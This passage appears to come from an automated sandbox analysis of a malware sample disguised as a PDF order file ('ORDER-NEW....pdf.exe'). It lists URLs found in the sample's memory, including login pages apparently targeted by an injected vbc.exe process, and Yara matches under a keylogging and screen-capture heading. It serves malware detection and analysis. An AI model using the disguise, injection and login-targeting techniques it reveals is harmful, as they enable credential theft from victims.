              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRZaO1x4iyU-YgxgvuerXdFmXdj8Ce3rNy8Mqw2SlqePXDg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRlHYHZu1FxxbUNbpii9NbSF3wy4srqmfLAOC-QBxw&s
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS2yfg_cFEuqKFbNZCaFykqy-jW3vHyGM224t0Sov33iXvh
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS7Tsy61sPGCiV6yILYtCYyP2q9i9bHmXBPqktk0xQvTH0l
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS9bnSRFZj9kLnT0CeZ7r27C9IrO3sFLnQL62gz&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSHEjIxVJou5NRecC2n_FnHaUJDfppR3IDOglu2Ry9INoxt
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSKx7_Dt9K5OFgp-raiLw2XdVNOTbR27N_DCL6T8VDVN_16
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSTkM_f5rN2hSSg3E_UshkUpgZ0a66Lz0rF6gF6&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcScI5035wSfgyvpN8fX27BnFHfF4a7I8z7Xlm7v&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSpNsTsg--kCoAxXjTvRrABIfJjd5ITzVx14ODQUC4wDGzB
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSrCEL2r-B2oHHnS0EeiVjQLJYayeF4GHjCZod9vr4&s
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSvX77JsybkskW6WoLj5kY6exJKuOkXoRWSsNgJbFY&s
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9-gm37CbSVQ1QMRdyqOvdY12lHBO7fXpaqZZqKP2Wbjr2
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKoe8A2_V1bWtOlP5fx10ZdjsJZv6l2_sKjTp6jVAPnp0g
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcThUknsbAksExwESRgK7TW5ujPLzgeGDT0-A3f5a1XrdyR-
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTo0t2j428kWHZlc2etqXbsI-zLrpgSp87E2H24&s=0
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v14/4UabrENHsxJlGDuGo1OIlLU94YtzCwA.woff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc-.woff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmSU5fBBc-.woff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc-.woff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQN
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBm
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipOcdIDtTfqJElTfRhjdFP9dPcYlW61iEhrydiuX=w92-h92-n-k-no
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: vbc.exe; String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.css
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.dr; String found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json?One
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json?One
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.086.0502.0006/OneDriveSetup.exe
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.103.0527.0003/update1.xml?OneDriveUpdate=d580ab8fe35aabd7f368aa
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=285df6c9c501a160c7a24c
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=4a941ab240f8b2c5ca3ca1
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://pki.goog/repository/0
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=28e3747a031f4b2a8498142b7c961529&c=MSN&d=http%3A%2F%2Fwww.msn
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://ssl.gstatic.com/gb/images/i1_1967ca6a.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.digicert.com/CPS0
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=993498051.1601450642
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: vbc.exe; String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/async/bgasy?ei=gTJ0X7zPLY2f1fAPlo2xoAI&yv=3&async=_fmt:jspb
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pq
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&ps
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/complete/search?q=ch&cp=2&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/complete/search?q=chr&cp=3&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/complete/search?q=chro&cp=4&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/complete/search?q=chrom&cp=5&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuse
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authus
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/favicon.ico
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/images/hpp/Chrome_Owned_96x96.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/images/icons/material/system/1x/email_grey600_24dp.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/images/nav_logo299.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/images/phd/px.gif
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/images/searchbox/desktop_searchbox_sprites302_hr.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/js/bg/4sIGg4Q0MrxdMwjTwsyJBGUAZbljSmH8-8Fa9_hVOC0.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/search
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/am=AAAAAABA
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUe
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.ConsentUi.en_GB.wmTUy5P6FUM.es5.O/ck=
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.bMYZ6MazNlM.
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/ac/cb/cb_cbu_kickin.svg
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_92x36dp.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/check_black_24dp.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/keyboard_arrow_down_grey600_24dp.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/kpui/social/fb_32x32.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/kpui/social/twitter_32x32.png
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.og2.en_US.vA2d_upwXfg.O/rt=j/m=def
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.LGkrjG2a9yI.O/rt=j/m=qabr
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.CniBF78B8Ew.L.X.O/m=qcwid/excm=qaaw
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.gstatic.com/ui/v1/activityindicator/loading_24.gif
Source: vbc.exe, 00000008.00000003.712462189.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712423496.00000000022B7000.00000004.00000001.sdmp, bhvF129.tmp.8.dr; String found in binary or memory: https://www.msn.com/
Source: bhvF129.tmp.8.dr; String found in binary or memory: https://www.msn.com/spartan/dhp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&ishostisol

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE
